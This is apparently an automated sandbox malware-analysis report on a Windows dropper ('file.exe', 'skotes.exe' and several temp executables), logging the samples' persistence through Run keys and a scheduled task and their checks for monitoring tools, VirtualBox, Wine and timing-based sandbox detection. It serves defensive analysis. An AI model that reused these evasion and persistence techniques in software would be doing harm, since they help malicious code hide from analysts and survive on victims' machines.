Source: C:\Users\user\Desktop\file.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: Regmonclass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: Filemonclass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: Regmonclass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1004154001\0d287ea527.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1004154001\0d287ea527.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1004154001\0d287ea527.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1004154001\0d287ea527.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1004154001\0d287ea527.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1004154001\0d287ea527.exe	Window searched: window name: Regmonclass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1004154001\0d287ea527.exe	Window searched: window name: Filemonclass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1004154001\0d287ea527.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1004154001\0d287ea527.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1004154001\0d287ea527.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1004154001\0d287ea527.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1004154001\0d287ea527.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1004154001\0d287ea527.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1004154001\0d287ea527.exe	Window searched: window name: Regmonclass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1004154001\0d287ea527.exe	Window searched: window name: Filemonclass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1004154001\0d287ea527.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1004155001\c4df60870c.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1004155001\c4df60870c.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1004155001\c4df60870c.exe	Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1004155001\c4df60870c.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1004155001\c4df60870c.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1004155001\c4df60870c.exe	Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1004155001\c4df60870c.exe	Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\1004155001\c4df60870c.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1004154001\0d287ea527.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1004154001\0d287ea527.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1004154001\0d287ea527.exe	Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1004154001\0d287ea527.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1004154001\0d287ea527.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1004154001\0d287ea527.exe	Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1004154001\0d287ea527.exe	Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\1004154001\0d287ea527.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1004154001\0d287ea527.exe	Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1004157001\a8e43ec2b6.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1004157001\a8e43ec2b6.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1004157001\a8e43ec2b6.exe	Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1004157001\a8e43ec2b6.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1004157001\a8e43ec2b6.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1004157001\a8e43ec2b6.exe	Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1004157001\a8e43ec2b6.exe	Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\1004157001\a8e43ec2b6.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1004155001\c4df60870c.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1004155001\c4df60870c.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1004155001\c4df60870c.exe	Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1004155001\c4df60870c.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1004155001\c4df60870c.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1004155001\c4df60870c.exe	Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1004155001\c4df60870c.exe	Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\1004155001\c4df60870c.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1004155001\c4df60870c.exe	Window searched: window name: Regmonclass

Source: C:\Users\user\Desktop\file.exe

File created: C:\Windows\Tasks\skotes.job

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 0d287ea527.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 0d287ea527.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run c4df60870c.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run c4df60870c.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 2f0cb7128a.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 2f0cb7128a.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run a8e43ec2b6.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run a8e43ec2b6.exe	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\1004154001\0d287ea527.exe

Registry key monitored for changes: HKEY_CURRENT_USER_Classes

Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1004149001\freecam.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1004149001\freecam.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1004154001\0d287ea527.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1004156001\2f0cb7128a.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1004156001\2f0cb7128a.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1004154001\0d287ea527.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1004157001\a8e43ec2b6.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1004157001\a8e43ec2b6.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1004157001\a8e43ec2b6.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1004157001\a8e43ec2b6.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1004157001\a8e43ec2b6.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1004157001\a8e43ec2b6.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1004157001\a8e43ec2b6.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1004157001\a8e43ec2b6.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1004157001\a8e43ec2b6.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1004157001\a8e43ec2b6.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1004157001\a8e43ec2b6.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1004157001\a8e43ec2b6.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1004157001\a8e43ec2b6.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1004157001\a8e43ec2b6.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1004157001\a8e43ec2b6.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1004157001\a8e43ec2b6.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1004156001\2f0cb7128a.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1004156001\2f0cb7128a.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Evasive API call chain: GetPEB, DecisionNodes, ExitProcess

graph_1-9929

Query firmware table information (likely to detect VMs)

Source: C:\Users\user\AppData\Local\Temp\1004154001\0d287ea527.exe	System information queried: FirmwareTableInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1004154001\0d287ea527.exe	System information queried: FirmwareTableInformation
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	System information queried: FirmwareTableInformation

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Source: C:\Users\user\Desktop\file.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1004154001\0d287ea527.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1004154001\0d287ea527.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1004154001\0d287ea527.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1004154001\0d287ea527.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1004155001\c4df60870c.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1004155001\c4df60870c.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1004154001\0d287ea527.exe	File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1004154001\0d287ea527.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\1004157001\a8e43ec2b6.exe	File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1004157001\a8e43ec2b6.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\1004155001\c4df60870c.exe	File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1004155001\c4df60870c.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__

Tries to detect virtualization through RDTSC time measurements

Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10E8ED4 second address: 10E8F02 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jmp 00007F5E907EB77Fh 0x0000000e jmp 00007F5E907EB784h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10E8F02 second address: 10E8F19 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F5E9072B8A0h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10E8F19 second address: 10E8F4D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5E907EB77Eh 0x00000007 push edi 0x00000008 pop edi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F5E907EB77Bh 0x00000013 push eax 0x00000014 jnp 00007F5E907EB776h 0x0000001a jmp 00007F5E907EB77Ah 0x0000001f pop eax 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10E8F4D second address: 10E8F82 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F5E9072B8A0h 0x00000008 pushad 0x00000009 popad 0x0000000a jmp 00007F5E9072B89Ah 0x0000000f push esi 0x00000010 pop esi 0x00000011 popad 0x00000012 pushad 0x00000013 jmp 00007F5E9072B8A0h 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10E81D3 second address: 10E81E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop esi 0x00000006 jc 00007F5E907EB78Fh 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10E8326 second address: 10E8353 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F5E9072B896h 0x0000000a popad 0x0000000b jmp 00007F5E9072B8A2h 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F5E9072B89Ch 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10E8353 second address: 10E8357 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10E8643 second address: 10E8665 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5E9072B8A8h 0x00000007 push eax 0x00000008 push edx 0x00000009 jp 00007F5E9072B896h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10E878F second address: 10E8795 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10EA122 second address: 10EA128 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10EA1F9 second address: 10EA224 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5E907EB77Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a mov dword ptr [esp+04h], eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jl 00007F5E907EB784h 0x00000016 jmp 00007F5E907EB77Eh 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10EA224 second address: 10EA229 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10EA229 second address: 10EA2CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop eax 0x0000000a push 00000000h 0x0000000c push ebx 0x0000000d call 00007F5E907EB778h 0x00000012 pop ebx 0x00000013 mov dword ptr [esp+04h], ebx 0x00000017 add dword ptr [esp+04h], 0000001Ch 0x0000001f inc ebx 0x00000020 push ebx 0x00000021 ret 0x00000022 pop ebx 0x00000023 ret 0x00000024 mov esi, dword ptr [ebp+122D3ABAh] 0x0000002a push 00000003h 0x0000002c mov dword ptr [ebp+122D2A79h], edx 0x00000032 push 00000000h 0x00000034 mov si, 7F21h 0x00000038 push 00000003h 0x0000003a push 00000000h 0x0000003c push ebp 0x0000003d call 00007F5E907EB778h 0x00000042 pop ebp 0x00000043 mov dword ptr [esp+04h], ebp 0x00000047 add dword ptr [esp+04h], 0000001Dh 0x0000004f inc ebp 0x00000050 push ebp 0x00000051 ret 0x00000052 pop ebp 0x00000053 ret 0x00000054 jmp 00007F5E907EB786h 0x00000059 call 00007F5E907EB77Ah 0x0000005e je 00007F5E907EB77Ch 0x00000064 mov edx, dword ptr [ebp+122D29E5h] 0x0000006a pop edi 0x0000006b call 00007F5E907EB779h 0x00000070 pushad 0x00000071 push eax 0x00000072 push edx 0x00000073 push eax 0x00000074 push edx 0x00000075 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10EA2CD second address: 10EA2D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10EA2D1 second address: 10EA2DF instructions: 0x00000000 rdtsc 0x00000002 jng 00007F5E907EB776h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push esi 0x0000000d pop esi 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10EA2DF second address: 10EA2E3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10EA2E3 second address: 10EA306 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 jno 00007F5E907EB782h 0x0000000e mov eax, dword ptr [esp+04h] 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10EA451 second address: 10EA455 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10EA455 second address: 10EA45B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10EA502 second address: 10EA535 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 mov dword ptr [esp], eax 0x00000008 pushad 0x00000009 jl 00007F5E9072B89Ch 0x0000000f mov edi, dword ptr [ebp+122D378Eh] 0x00000015 call 00007F5E9072B89Fh 0x0000001a mov bl, CCh 0x0000001c pop esi 0x0000001d popad 0x0000001e push 00000000h 0x00000020 push D5AEFE7Dh 0x00000025 pushad 0x00000026 pushad 0x00000027 push eax 0x00000028 push edx 0x00000029 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10EA535 second address: 10EA540 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10EA540 second address: 10EA544 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10EA544 second address: 10EA588 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 add dword ptr [esp], 2A510203h 0x0000000e mov dh, ah 0x00000010 push 00000003h 0x00000012 push ebx 0x00000013 mov dh, ah 0x00000015 pop edx 0x00000016 push 00000000h 0x00000018 mov dword ptr [ebp+122D1DCBh], eax 0x0000001e mov edi, dword ptr [ebp+122D3AAAh] 0x00000024 push 00000003h 0x00000026 ja 00007F5E907EB779h 0x0000002c or cl, FFFFFFA0h 0x0000002f push 5B323450h 0x00000034 push eax 0x00000035 push edx 0x00000036 jmp 00007F5E907EB77Eh 0x0000003b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10EA588 second address: 10EA5E8 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F5E9072B898h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a add dword ptr [esp], 64CDCBB0h 0x00000011 push 00000000h 0x00000013 push esi 0x00000014 call 00007F5E9072B898h 0x00000019 pop esi 0x0000001a mov dword ptr [esp+04h], esi 0x0000001e add dword ptr [esp+04h], 00000015h 0x00000026 inc esi 0x00000027 push esi 0x00000028 ret 0x00000029 pop esi 0x0000002a ret 0x0000002b ja 00007F5E9072B89Ch 0x00000031 lea ebx, dword ptr [ebp+1244F083h] 0x00000037 mov ecx, 46CD8C3Ah 0x0000003c xchg eax, ebx 0x0000003d jmp 00007F5E9072B89Eh 0x00000042 push eax 0x00000043 push edi 0x00000044 push eax 0x00000045 push edx 0x00000046 jnc 00007F5E9072B896h 0x0000004c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 110914C second address: 1109151 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1109470 second address: 1109489 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F5E9072B8A0h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1109489 second address: 110948D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11097B6 second address: 11097BB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
